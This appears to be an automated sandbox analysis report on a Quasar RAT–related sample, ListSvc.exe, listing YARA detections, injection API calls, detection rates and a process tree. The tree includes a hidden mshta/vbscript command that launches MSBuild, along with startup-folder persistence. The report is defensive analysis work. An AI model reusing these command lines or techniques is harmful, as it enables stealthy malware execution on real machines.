Source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/ListSvc.lnk, type: DROPPED	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk, type: DROPPED	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	0_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	1_2_0060F6D8
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	2_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	3_2_0060F6D8

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: String function: 00427848 appears 42 times
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: String function: 0040CC60 appears 34 times
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: String function: 0040873C appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: String function: 005F5C7C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: String function: 005F5F60 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: String function: 005DE888 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 0060CD28 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 005F5C7C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 005F5F60 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 005DE888 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 006163B4 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: String function: 00616130 appears 39 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05170054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,		6_2_05170054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05170000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,TerminateProcess,		6_2_05170000

Source: ListSvc.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: ListSvc.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: is-H2SC5.tmp.3.dr	Static PE information: No import functions for PE file found
Source: is-0A4N9.tmp.3.dr	Static PE information: No import functions for PE file found
Source: wukkzmi2.dll.30.dr	Static PE information: No import functions for PE file found
Source: atxm53jg.dll.13.dr	Static PE information: No import functions for PE file found

Source: ListSvc.exe, 00000000.00000000.347952010.00000000004C6000.00000002.00020000.sdmp	Binary or memory string: OriginalFileName vs ListSvc.exe
Source: ListSvc.exe, 00000000.00000003.356941654.00000000022C8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs ListSvc.exe
Source: ListSvc.exe, 00000002.00000003.355772001.000000007FBA0000.00000004.00000001.sdmp	Binary or memory string: OriginalFileName vs ListSvc.exe
Source: ListSvc.exe, 00000002.00000003.369664742.0000000002218000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs ListSvc.exe

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@39/53@1/2

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Core/Helper/WindowsAccountHelper.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Core/Helper/WindowsAccountHelper.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Core/Helper/WindowsAccountHelper.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Core/Helper/WindowsAccountHelper.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\ListSvc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ListSvc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ListSvc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ListSvc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,

0_2_004AF9F0

Source: MSBuild.exe, 00000005.00000002.366748264.0000000002E61000.00000004.00000001.sdmp	Binary or memory string: m3C:\Windows\Microsoft.NET\Framework\v4.0.30319\*.sln
Source: MSBuild.exe, 00000005.00000002.366748264.0000000002E61000.00000004.00000001.sdmp	Binary or memory string: *.slnP#
Source: MSBuild.exe, 00000005.00000002.366748264.0000000002E61000.00000004.00000001.sdmp, MSBuild.exe, 00000006.00000002.442305524.0000000002511000.00000004.00000001.sdmp, MSBuild.exe, 00000019.00000002.556369122.0000000002861000.00000004.00000001.sdmp	Binary or memory string: *.sln
Source: MSBuild.exe, 00000006.00000002.442305524.0000000002511000.00000004.00000001.sdmp, MSBuild.exe, 00000019.00000002.556369122.0000000002861000.00000004.00000001.sdmp	Binary or memory string: .sln,

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: ListSvc.exe	Virustotal: Detection: 54%
Source: ListSvc.exe	Metadefender: Detection: 29%
Source: ListSvc.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\ListSvc.exe

File read: C:\Users\user\Desktop\ListSvc.exe

Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ListSvc.exe 'C:\Users\user\Desktop\ListSvc.exe'
Source: C:\Users\user\Desktop\ListSvc.exe	Process created: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp 'C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp' /SL5='$6001E,1447979,821248,C:\Users\user\Desktop\ListSvc.exe'
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process created: C:\Users\user\Desktop\ListSvc.exe 'C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT
Source: C:\Users\user\Desktop\ListSvc.exe	Process created: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp 'C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp' /SL5='$50392,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet'
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Users\user\AppData\Roaming\AppLaunch.exe C:\Users\user\AppData\Roaming\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3401.tmp' 'c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:execute('createobject(''wscript.shell'').run ''\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild ''''C:\Users\user\AppData\Local\Temp\ListSvc.url'''''',0:close()')
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Local\Temp\ListSvc.url'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF3F6.tmp' 'c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\ListSvc.exe	Process created: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp 'C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp' /SL5='$6001E,1447979,821248,C:\Users\user\Desktop\ListSvc.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process created: C:\Users\user\Desktop\ListSvc.exe 'C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\ListSvc.exe	Process created: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp 'C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp' /SL5='$50392,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url'	Jump to behavior
